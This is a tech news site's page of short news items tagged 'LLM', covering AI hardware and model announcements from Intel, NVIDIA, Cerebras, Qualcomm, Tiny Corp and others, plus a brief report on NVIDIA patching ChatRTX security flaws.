News Posts matching #LLM

Return to Keyword Browsing

Intel Builds World's Largest Neuromorphic System to Enable More Sustainable AI

Today, Intel announced that it has built the world's largest neuromorphic system. Code-named Hala Point, this large-scale neuromorphic system, initially deployed at Sandia National Laboratories, utilizes Intel's Loihi 2 processor, aims at supporting research for future brain-inspired artificial intelligence (AI), and tackles challenges related to the efficiency and sustainability of today's AI. Hala Point advances Intel's first-generation large-scale research system, Pohoiki Springs, with architectural improvements to achieve over 10 times more neuron capacity and up to 12 times higher performance.

"The computing cost of today's AI models is rising at unsustainable rates. The industry needs fundamentally new approaches capable of scaling. For that reason, we developed Hala Point, which combines deep learning efficiency with novel brain-inspired learning and optimization capabilities. We hope that research with Hala Point will advance the efficiency and adaptability of large-scale AI technology." -Mike Davies, director of the Neuromorphic Computing Lab at Intel Labs

NVIDIA Issues Patches for ChatRTX AI Chatbot, Suspect to Improper Privilege Management

Just a month after releasing the 0.1 beta preview of Chat with RTX, now called ChatRTX, NVIDIA has swiftly addressed critical security vulnerabilities discovered in its cutting-edge AI chatbot. The chatbot was found to be susceptible to cross-site scripting attacks (CWE-79) and improper privilege management attacks (CWE-269) in version 0.2 and all prior releases. The identified vulnerabilities posed significant risks to users' personal data and system security. Cross-site scripting attacks could allow malicious actors to inject scripts into the chatbot's interface, potentially compromising sensitive information. The improper privilege management flaw could also enable attackers to escalate their privileges and gain administrative control over users' systems and files.

Upon becoming aware of these vulnerabilities, NVIDIA promptly released an updated version of ChatRTX 0.2, available for download from its official website. The latest iteration of the software addresses these security issues, providing users with a more secure experience. As ChatRTX utilizes retrieval augmented generation (RAG) and NVIDIA Tensor-RT LLM software to allow users to train the chatbot on their personal data, the presence of such vulnerabilities is particularly concerning. Users are strongly advised to update their ChatRTX software to the latest version to mitigate potential risks and protect their personal information. ChatRTX remains in beta version, with no official release candidate timeline announced. As NVIDIA continues to develop and refine this innovative AI chatbot, the company must prioritize security and promptly address any vulnerabilities that may arise, ensuring a safe and reliable user experience.

NVIDIA Hopper Leaps Ahead in Generative AI at MLPerf

It's official: NVIDIA delivered the world's fastest platform in industry-standard tests for inference on generative AI. In the latest MLPerf benchmarks, NVIDIA TensorRT-LLM—software that speeds and simplifies the complex job of inference on large language models—boosted the performance of NVIDIA Hopper architecture GPUs on the GPT-J LLM nearly 3x over their results just six months ago. The dramatic speedup demonstrates the power of NVIDIA's full-stack platform of chips, systems and software to handle the demanding requirements of running generative AI. Leading companies are using TensorRT-LLM to optimize their models. And NVIDIA NIM—a set of inference microservices that includes inferencing engines like TensorRT-LLM—makes it easier than ever for businesses to deploy NVIDIA's inference platform.

Raising the Bar in Generative AI
TensorRT-LLM running on NVIDIA H200 Tensor Core GPUs—the latest, memory-enhanced Hopper GPUs—delivered the fastest performance running inference in MLPerf's biggest test of generative AI to date. The new benchmark uses the largest version of Llama 2, a state-of-the-art large language model packing 70 billion parameters. The model is more than 10x larger than the GPT-J LLM first used in the September benchmarks. The memory-enhanced H200 GPUs, in their MLPerf debut, used TensorRT-LLM to produce up to 31,000 tokens/second, a record on MLPerf's Llama 2 benchmark. The H200 GPU results include up to 14% gains from a custom thermal solution. It's one example of innovations beyond standard air cooling that systems builders are applying to their NVIDIA MGX designs to take the performance of Hopper GPUs to new heights.

Tiny Corp. Prepping Separate AMD & NVIDIA GPU-based AI Compute Systems

George Hotz and his startup operation (Tiny Corporation) appeared ready to completely abandon AMD Radeon GPUs last week, after experiencing a period of firmware-related headaches. The original plan involved the development of a pre-orderable $15,000 TinyBox AI compute cluster that housed six XFX Speedster MERC310 RX 7900 XTX graphics cards, but software/driver issues prompted experimentation via alternative hardware routes. A lot of media coverage has focused on the unusual adoption of consumer-grade GPUs—Tiny Corp.'s struggles with RDNA 3 (rather than CDNA 3) were maneuvered further into public view, after top AMD brass pitched in.

The startup's social media feed is very transparent about showcasing everyday tasks, problem-solving and important decision-making. Several Acer Predator BiFrost Arc A770 OC cards were purchased and promptly integrated into a colorfully-lit TinyBox prototype, but Hotz & Co. swiftly moved onto Team Green pastures. Tiny Corp. has begrudgingly adopted NVIDIA GeForce RTX 4090 GPUs. Earlier today, it was announced that work on the AMD-based system has resumed—although customers were forewarned about anticipated teething problems. The surprising message arrived in the early hours: "a hard to find 'umr' repo has turned around the feasibility of the AMD TinyBox. It will be a journey, but it gives us an ability to debug. We're going to sell both, red for $15,000 and green for $25,000. When you realize your pre-order you'll choose your color. Website has been updated. If you like to tinker and feel pain, buy red. The driver still crashes the GPU and hangs sometimes, but we can work together to improve it."

Qualcomm Announces the Snapdragon 7+ Gen 3, Featuring Exceptional On-Device AI Capabilities

Qualcomm Technologies, Inc., unveiled today the Snapdragon 7+ Gen 3 Mobile Platform, bringing on-device generative AI into the Snapdragon 7 series. The Mobile Platform supports a wide range of AI models including large language models (LLMs) such as Baichuan-7B, Llama 2, and Gemini Nano. Fueling extraordinary entertainment capabilities, Snapdragon 7+ Gen 3 also brings new select Snapdragon Elite Gaming features to the 7-series including Game Post Processing Accelerator and Adreno Frame Motion Engine 2, enhancing game effects and upscaling gaming content for desktop-level visuals. Plus, this platform brings top-notch photography features with our industry-leading 18-bit cognitive ISP.

"Today, we embark on the latest expansion in the 7-series to create new levels of entertainment for consumers - integrating next-generation technologies for richer experiences," said Chris Patrick, senior vice president and general manager of mobile handsets, Qualcomm Technologies, Inc. "Snapdragon 7+ Gen 3 is packed with support for incredible on-device generative AI features and provides incredible performance and power efficiency, while bringing Wi-Fi 7 to the Snapdragon 7 Series for the first time."

Samsung Roadmaps UFS 5.0 Storage Standard, Predicts Commercialization by 2027

Mobile tech tipster, Revegnus, has highlighted an interesting Samsung presentation slide—according to machine translation, the company's electronics division is already responding to an anticipated growth of "client-side large language model" service development. This market trend will demand improved Universal Flash Storage (UFS) interface speeds—Samsung engineers are currently engaged in: "developing a new product that uses UFS 4.0 technology, but increases the number of channels from the current 2 to 4." The upcoming "more advanced" UFS 4.0 storage chips could be beefy enough to be utilized alongside next-gen mobile processors in 2025. For example; ARM is gearing up "Blackhawk," the Cortex-X4's successor—industry watchdogs reckon that the semiconductor firm's new core is designed to deliver "great Large Language Model (LLM) performance" on future smartphones. Samsung's roadmap outlines another major R&D goal, but this prospect is far off from finalization—their chart reveals an anticipated 2027 rollout. The slide's body of text included a brief teaser: "at the same time, we are also actively participating in discussions on the UFS 5.0 standard."

Tiny Corp. Pauses Development of AMD Radeon GPU-based Tinybox AI Cluster

George Hotz and his Tiny Corporation colleagues were pinning their hopes on AMD delivering some good news earlier this month. The development of a "TinyBox" AI compute cluster project hit some major roadblocks a couple of weeks ago—at the time, Radeon RX 7900 XTX GPU firmware was not gelling with Tiny Corp.'s setup. Hotz expressed "70% confidence" in AMD approving open-sourcing certain bits of firmware. At the time of writing this has not transpired—this week the Tiny Corp. social media account has, once again, switched to an "all guns blazing" mode. Hotz and Co. have publicly disclosed that they were dabbling with Intel Arc graphics cards, as of a few weeks ago. NVIDIA hardware is another possible route, according to freshly posted open thoughts.

Yesterday, it was confirmed that the young startup organization had paused its utilization of XFX Speedster MERC310 RX 7900 XTX graphics cards: "the driver is still very unstable, and when it crashes or hangs we have no way of debugging it. We have no way of dumping the state of a GPU. Apparently it isn't just the MES causing these issues, it's also the Command Processor (CP). After seeing how open Tenstorrent is, it's hard to deal with this. With Tenstorrent, I feel confident that if there's an issue, I can debug and fix it. With AMD, I don't." The $15,000 TinyBox system relies on "cheaper" gaming-oriented GPUs, rather than traditional enterprise solutions—this oddball approach has attracted a number of customers, but the latest announcements likely signal another delay. Yesterday's tweet continued to state: "we are exploring Intel, working on adding Level Zero support to tinygrad. We also added a $400 bounty for XMX support. We are also (sadly) exploring a 6x GeForce RTX 4090 GPU box. At least we know the software is good there. We will revisit AMD once we have an open and reproducible build process for the driver and firmware. We are willing to dive really deep into hardware to make it amazing. But without access, we can't."

Ubisoft Exploring Generative AI, Could Revolutionize NPC Narratives

Have you ever dreamed of having a real conversation with an NPC in a video game? Not just one gated within a dialogue tree of pre-determined answers, but an actual conversation, conducted through spontaneous action and reaction? Lately, a small R&D team at Ubisoft's Paris studio, in collaboration with Nvidia's Audio2Face application and Inworld's Large Language Model (LLM), have been experimenting with generative AI in an attempt to turn this dream into a reality. Their project, NEO NPC, uses GenAI to prod at the limits of how a player can interact with an NPC without breaking the authenticity of the situation they are in, or the character of the NPC itself.

Considering that word—authenticity—the project has had to be a hugely collaborative effort across artistic and scientific disciplines. Generative AI is a hot topic of conversation in the videogame industry, and Senior Vice President of Production Technology Guillemette Picard is keen to stress that the goal behind all genAI projects at Ubisoft is to bring value to the player; and that means continuing to focus on human creativity behind the scenes. "The way we worked on this project, is always with our players and our developers in mind," says Picard. "With the player in mind, we know that developers and their creativity must still drive our projects. Generative AI is only of value if it has value for them."

NVIDIA Digital Human Technologies Bring AI Characters to Life

NVIDIA announced today that leading AI application developers across a wide range of industries are using NVIDIA digital human technologies to create lifelike avatars for commercial applications and dynamic game characters. The results are on display at GTC, the global AI conference held this week in San Jose, Calif., and can be seen in technology demonstrations from Hippocratic AI, Inworld AI, UneeQ and more.

NVIDIA Avatar Cloud Engine (ACE) for speech and animation, NVIDIA NeMo for language, and NVIDIA RTX for ray-traced rendering are the building blocks that enable developers to create digital humans capable of AI-powered natural language interactions, making conversations more realistic and engaging.

NVIDIA Blackwell Platform Arrives to Power a New Era of Computing

Powering a new era of computing, NVIDIA today announced that the NVIDIA Blackwell platform has arrived—enabling organizations everywhere to build and run real-time generative AI on trillion-parameter large language models at up to 25x less cost and energy consumption than its predecessor.

The Blackwell GPU architecture features six transformative technologies for accelerated computing, which will help unlock breakthroughs in data processing, engineering simulation, electronic design automation, computer-aided drug design, quantum computing and generative AI—all emerging industry opportunities for NVIDIA.

Gigabyte Unveils Comprehensive and Powerful AI Platforms at NVIDIA GTC

GIGABYTE Technology and Giga Computing, a subsidiary of GIGABYTE and an industry leader in enterprise solutions, will showcase their solutions at the GIGABYTE booth #1224 at NVIDIA GTC, a global AI developer conference running through March 21. This event will offer GIGABYTE the chance to connect with its valued partners and customers, and together explore what the future in computing holds.

The GIGABYTE booth will focus on GIGABYTE's enterprise products that demonstrate AI training and inference delivered by versatile computing platforms based on NVIDIA solutions, as well as direct liquid cooling (DLC) for improved compute density and energy efficiency. Also not to be missed at the NVIDIA booth is the MGX Pavilion, which features a rack of GIGABYTE servers for the NVIDIA GH200 Grace Hopper Superchip architecture.

Report: Apple to Use Google's Gemini AI for iPhones

In the world where the largest companies are riding the AI train, the biggest of them all—Apple—seemed to stay quiet for a while. Even with many companies announcing their systems/models, Apple has stayed relatively silent about the use of LLMs in their products. However, according to Bloomberg, Apple is not pushing out an AI model of its own; rather, it will license Google's leading Gemini models for its iPhone smartphones. Gemini is Google's leading AI model with three variants: Gemini Nano 1/2, Gemini Pro, and Gemini Ultra. The Gemini Nano 1 and Nano 2 are designed to run locally on hardware like smartphones. At the same time, Gemini Pro and Ultra are inferenced from Google's servers onto a local device using API and the internet.

Apple could use a local Gemini Nano for basic tasks while also utilizing Geminin Pro or Ultra for more complex tasks, where a router sends user input to the available model. That way, users could use AI capabilities both online and offline. Since Apple is readying a suite of changes for iOS version 18, backed by Neural Engine inside A-series Bionic chips, the LLM game of Apple's iPhones might get a significant upgrade with the Google partnership. While we still don't know the size of the deal, it surely is a massive deal for Google to tap into millions of devices Apple ships every year and for Apple to give its users a more optimized experience.

MemVerge and Micron Boost NVIDIA GPU Utilization with CXL Memory

MemVerge, a leader in AI-first Big Memory Software, has joined forces with Micron to unveil a groundbreaking solution that leverages intelligent tiering of CXL memory, boosting the performance of large language models (LLMs) by offloading from GPU HBM to CXL memory. This innovative collaboration is being showcased in Micron booth #1030 at GTC, where attendees can witness firsthand the transformative impact of tiered memory on AI workloads.

Charles Fan, CEO and Co-founder of MemVerge, emphasized the critical importance of overcoming the bottleneck of HBM capacity. "Scaling LLM performance cost-effectively means keeping the GPUs fed with data," stated Fan. "Our demo at GTC demonstrates that pools of tiered memory not only drive performance higher but also maximize the utilization of precious GPU resources."

MAINGEAR Introduces PRO AI Workstations Featuring aiDAPTIV+ For Cost-Effective Large Language Model Training

MAINGEAR, a leading provider of high-performance custom PC systems, and Phison, a global leader in NAND controllers and storage solutions, today unveiled groundbreaking MAINGEAR PRO AI workstations with Phison's aiDAPTIV+ technology. Specifically engineered to democratize Large Language Model (LLM) development and training for small and medium-sized businesses (SMBs), these ultra-powerful workstations incorporate aiDAPTIV+ technology to deliver supercomputer LLM training capabilities at a fraction of the cost of traditional AI training servers.

As the demand for large-scale generative AI models continues to surge and their complexity increases, the potential for LLMs also expands. However, this rapid advancement in LLM AI technology has led to a notable boost in hardware requirements, making model training cost-prohibitive and inaccessible for many small to medium businesses.

Cerebras & G42 Break Ground on Condor Galaxy 3 - an 8 exaFLOPs AI Supercomputer

Cerebras Systems, the pioneer in accelerating generative AI, and G42, the Abu Dhabi-based leading technology holding group, today announced the build of Condor Galaxy 3 (CG-3), the third cluster of their constellation of AI supercomputers, the Condor Galaxy. Featuring 64 of Cerebras' newly announced CS-3 systems - all powered by the industry's fastest AI chip, the Wafer-Scale Engine 3 (WSE-3) - Condor Galaxy 3 will deliver 8 exaFLOPs of AI with 58 million AI-optimized cores. The Cerebras and G42 strategic partnership already delivered 8 exaFLOPs of AI supercomputing performance via Condor Galaxy 1 and Condor Galaxy 2, each amongst the largest AI supercomputers in the world. Located in Dallas, Texas, Condor Galaxy 3 brings the current total of the Condor Galaxy network to 16 exaFLOPs.

"With Condor Galaxy 3, we continue to achieve our joint vision of transforming the worldwide inventory of AI compute through the development of the world's largest and fastest AI supercomputers," said Kiril Evtimov, Group CTO of G42. "The existing Condor Galaxy network has trained some of the leading open-source models in the industry, with tens of thousands of downloads. By doubling the capacity to 16exaFLOPs, we look forward to seeing the next wave of innovation Condor Galaxy supercomputers can enable." At the heart of Condor Galaxy 3 are 64 Cerebras CS-3 Systems. Each CS-3 is powered by the new 4 trillion transistor, 900,000 AI core WSE-3. Manufactured at TSMC at the 5-nanometer node, the WSE-3 delivers twice the performance at the same power and for the same price as the previous generation part. Purpose built for training the industry's largest AI models, WSE-3 delivers an astounding 125 petaflops of peak AI performance per chip.

ZOTAC Expands Computing Hardware with GPU Server Product Line for the AI-Bound Future

ZOTAC Technology Limited, a global leader in innovative technology solutions, expands its product portfolio with the GPU Server Series. The first series of products in ZOTAC's Enterprise lineup offers organizations affordable and high-performance computing solutions for a wide range of demanding applications, from core-to-edge inferencing and data visualization to model training, HPC modeling, and simulation.

The ZOTAC series of GPU Servers comes in a diverse range of form factors and configurations, featuring both Tower Workstations and Rack Mount Servers, as well as both Intel and AMD processor configurations. With support for up to 10 GPUs, modular design for easier access to internal hardware, a high space-to-performance ratio, and industry-standard features like redundant power supplies and extensive cooling options, ZOTAC's enterprise solutions can ensure optimal performance and durability, even under sustained intense workloads.

Cerebras Systems Unveils World's Fastest AI Chip with 4 Trillion Transistors and 900,000 AI cores

Cerebras Systems, the pioneer in accelerating generative AI, has doubled down on its existing world record of fastest AI chip with the introduction of the Wafer Scale Engine 3. The WSE-3 delivers twice the performance of the previous record-holder, the Cerebras WSE-2, at the same power draw and for the same price. Purpose built for training the industry's largest AI models, the 5 nm-based, 4 trillion transistor WSE-3 powers the Cerebras CS-3 AI supercomputer, delivering 125 petaflops of peak AI performance through 900,000 AI optimized compute cores.

Intel Gaudi2 Accelerator Beats NVIDIA H100 at Stable Diffusion 3 by 55%

Stability AI, the developers behind the popular Stable Diffusion generative AI model, have run some first-party performance benchmarks for Stable Diffusion 3 using popular data-center AI GPUs, including the NVIDIA H100 "Hopper" 80 GB, A100 "Ampere" 80 GB, and Intel's Gaudi2 96 GB accelerator. Unlike the H100, which is a super-scalar CUDA+Tensor core GPU; the Gaudi2 is purpose-built to accelerate generative AI and LLMs. Stability AI published its performance findings in a blog post, which reveals that the Intel Gaudi2 96 GB is posting a roughly 56% higher performance than the H100 80 GB.

With 2 nodes, 16 accelerators, and a constant batch size of 16 per accelerator (256 in all), the Intel Gaudi2 array is able to generate 927 images per second, compared to 595 images for the H100 array, and 381 images per second for the A100 array, keeping accelerator and node counts constant. Scaling things up a notch to 32 nodes, and 256 accelerators or a batch size of 16 per accelerator (total batch size of 4,096), the Gaudi2 array is posting 12,654 images per second; or 49.4 images per-second per-device; compared to 3,992 images per second or 15.6 images per-second per-device for the older-gen A100 "Ampere" array.

AMD Publishes User Guide for LM Studio - a Local AI Chatbot

AMD has caught up with NVIDIA and Intel in the race to get a locally run AI chatbot up and running on its respective hardware. Team Red's community hub welcomed a new blog entry on Wednesday—AI staffers published a handy "How to run a Large Language Model (LLM) on your AMD Ryzen AI PC or Radeon Graphics Card" step-by-step guide. They recommend that interested parties are best served by downloading the correct version of LM Studio. Their CPU-bound Windows variant—designed for higher-end Phoenix and Hawk Point chips—compatible Ryzen AI PCs can deploy instances of a GPT based LLM-powered AI chatbot. The LM Studio ROCm technical preview functions similarly, but is reliant on Radeon RX 7000 graphics card ownership. Supported GPU targets include: gfx1100, gfx1101 and gfx1102.

AMD believes that: "AI assistants are quickly becoming essential resources to help increase productivity, efficiency or even brainstorm for ideas." Their blog also puts a spotlight on LM Studio's offline functionality: "Not only does the local AI chatbot on your machine not require an internet connection—but your conversations stay on your local machine." The six-step guide invites curious members to experiment with a handful of large language models—most notably Mistral 7b and LLAMA v2 7b. They thoroughly recommend that you select options with "Q4 K M" (AKA 4-bit quantization). You can learn about spooling up "your very own AI chatbot" here.

Chinese Governing Bodies Reportedly Offering "Compute Vouchers" to AI Startups

Regional Chinese governments are attempting to prop up local AI startup companies with an intriguing "voucher" support system. A Financial Times article outlines "computing" support packages valued between "$140,000 to $280,000" for fledgling organizations involved in LLM training. Widespread shortages of AI chips and rising data center operation costs are cited as the main factors driving a rollout of strategic subsidizations. The big three—Alibaba, Tencent, and ByteDance—are reportedly less willing to rent out their AI-crunching servers, due to internal operations demanding lengthy compute sessions. China's largest technology companies are believed to hording the vast majority of NVIDIA AI hardware, while smaller competitors are believed to fighting over table scraps. US trade restrictions have further escalated supply issues, with lower-performance/China-specific models being rejected—AMD's Instinct MI309 AI accelerator being the latest example.

The "computer voucher" initiative could be the first part of a wider scheme—reports suggest that regional governing bodies (including Shanghai) are devising another subsidy tier for domestic AI chips. Charlie Chai, an 86Research analyst, reckons that the initial support package is only a short-term solution. He shared this observation with FT: "the voucher is helpful to address the cost barrier, but it will not help with the scarcity of the resources." The Chinese government is reportedly looking into the creation of an alternative state-run system, that will become less reliant on a "Big Tech" data center model. A proposed "East Data West Computing" project could produce a more energy-efficient cluster of AI data centers, combined with a centralized management system.

IBM Announces Availability of Open-Source Mistral AI Model on watsonx

IBM announced the availability of the popular open-source Mixtral-8x7B large language model (LLM), developed by Mistral AI, on its watsonx AI and data platform, as it continues to expand capabilities to help clients innovate with IBM's own foundation models and those from a range of open-source providers. IBM offers an optimized version of Mixtral-8x7B that, in internal testing, was able to increase throughput—or the amount of data that can be processed in a given time period—by 50 percent when compared to the regular model. This could potentially cut latency by 35-75 percent, depending on batch size—speeding time to insights. This is achieved through a process called quantization, which reduces model size and memory requirements for LLMs and, in turn, can speed up processing to help lower costs and energy consumption.

The addition of Mixtral-8x7B expands IBM's open, multi-model strategy to meet clients where they are and give them choice and flexibility to scale enterprise AI solutions across their businesses. Through decades-long AI research and development, open collaboration with Meta and Hugging Face, and partnerships with model leaders, IBM is expanding its watsonx.ai model catalog and bringing in new capabilities, languages, and modalities. IBM's enterprise-ready foundation model choices and its watsonx AI and data platform can empower clients to use generative AI to gain new insights and efficiencies, and create new business models based on principles of trust. IBM enables clients to select the right model for the right use cases and price-performance goals for targeted business domains like finance.

ServiceNow, Hugging Face & NVIDIA Release StarCoder2 - a New Open-Access LLM Family

ServiceNow, Hugging Face, and NVIDIA today announced the release of StarCoder2, a family of open-access large language models for code generation that sets new standards for performance, transparency, and cost-effectiveness. StarCoder2 was developed in partnership with the BigCode Community, managed by ServiceNow, the leading digital workflow company making the world work better for everyone, and Hugging Face, the most-used open-source platform, where the machine learning community collaborates on models, datasets, and applications. Trained on 619 programming languages, StarCoder2 can be further trained and embedded in enterprise applications to perform specialized tasks such as application source code generation, workflow generation, text summarization, and more. Developers can use its code completion, advanced code summarization, code snippets retrieval, and other capabilities to accelerate innovation and improve productivity.

StarCoder2 offers three model sizes: a 3-billion-parameter model trained by ServiceNow; a 7-billion-parameter model trained by Hugging Face; and a 15-billion-parameter model built by NVIDIA with NVIDIA NeMo and trained on NVIDIA accelerated infrastructure. The smaller variants provide powerful performance while saving on compute costs, as fewer parameters require less computing during inference. In fact, the new 3-billion-parameter model matches the performance of the original StarCoder 15-billion-parameter model. "StarCoder2 stands as a testament to the combined power of open scientific collaboration and responsible AI practices with an ethical data supply chain," emphasized Harm de Vries, lead of ServiceNow's StarCoder2 development team and co-lead of BigCode. "The state-of-the-art open-access model improves on prior generative AI performance to increase developer productivity and provides developers equal access to the benefits of code generation AI, which in turn enables organizations of any size to more easily meet their full business potential."

Supermicro Accelerates Performance of 5G and Telco Cloud Workloads with New and Expanded Portfolio of Infrastructure Solutions

Supermicro, Inc. (NASDAQ: SMCI), a Total IT Solution Provider for AI, Cloud, Storage, and 5G/Edge, delivers an expanded portfolio of purpose-built infrastructure solutions to accelerate performance and increase efficiency in 5G and telecom workloads. With one of the industry's most diverse offerings, Supermicro enables customers to expand public and private 5G infrastructures with improved performance per watt and support for new and innovative AI applications. As a long-term advocate of open networking platforms and a member of the O-RAN Alliance, Supermicro's portfolio incorporates systems featuring 5th Gen Intel Xeon processors, AMD EPYC 8004 Series processors, and the NVIDIA Grace Hopper Superchip.

"Supermicro is expanding our broad portfolio of sustainable and state-of-the-art servers to address the demanding requirements of 5G and telco markets and Edge AI," said Charles Liang, president and CEO of Supermicro. "Our products are not just about technology, they are about delivering tangible customer benefits. We quickly bring data center AI capabilities to the network's edge using our Building Block architecture. Our products enable operators to offer new capabilities to their customers with improved performance and lower energy consumption. Our edge servers contain up to 2 TB of high-speed DDR5 memory, 6 PCIe slots, and a range of networking options. These systems are designed for increased power efficiency and performance-per-watt, enabling operators to create high-performance, customized solutions for their unique requirements. This reassures our customers that they are investing in reliable and efficient solutions."

Intel Optimizes PyTorch for Llama 2 on Arc A770, Higher Precision FP16

Intel just announced optimizations for PyTorch (IPEX) to take advantage of the AI acceleration features of its Arc "Alchemist" GPUs.PyTorch is a popular machine learning library that is often associated with NVIDIA GPUs, but it is actually platform-agnostic. It can be run on a variety of hardware, including CPUs and GPUs. However, performance may not be optimal without specific optimizations. Intel offers such optimizations through the Intel Extension for PyTorch (IPEX), which extends PyTorch with optimizations specifically designed for Intel's compute hardware.

Intel released a blog post detailing how to run Meta AI's Llama 2 large language model on its Arc "Alchemist" A770 graphics card. The model requires 14 GB of GPU RAM, so a 16 GB version of the A770 is recommended. This development could be seen as a direct response to NVIDIA's Chat with RTX tool, which allows GeForce users with >8 GB RTX 30-series "Ampere" and RTX 40-series "Ada" GPUs to run PyTorch-LLM models on their graphics cards. NVIDIA achieves lower VRAM usage by distributing INT4-quantized versions of the models, while Intel uses a higher-precision FP16 version. In theory, this should not have a significant impact on the results. This blog post by Intel provides instructions on how to set up Llama 2 inference with PyTorch (IPEX) on the A770.

Google's Gemma Optimized to Run on NVIDIA GPUs, Gemma Coming to Chat with RTX

NVIDIA, in collaboration with Google, today launched optimizations across all NVIDIA AI platforms for Gemma—Google's state-of-the-art new lightweight 2 billion- and 7 billion-parameter open language models that can be run anywhere, reducing costs and speeding innovative work for domain-specific use cases.

Teams from the companies worked closely together to accelerate the performance of Gemma—built from the same research and technology used to create the Gemini models—with NVIDIA TensorRT-LLM, an open-source library for optimizing large language model inference, when running on NVIDIA GPUs in the data center, in the cloud and on PCs with NVIDIA RTX GPUs. This allows developers to target the installed base of over 100 million NVIDIA RTX GPUs available in high-performance AI PCs globally.
Return to Keyword Browsing
May 1st, 2024 02:15 EDT change timezone

New Forum Posts

Popular Reviews

Controversial News Posts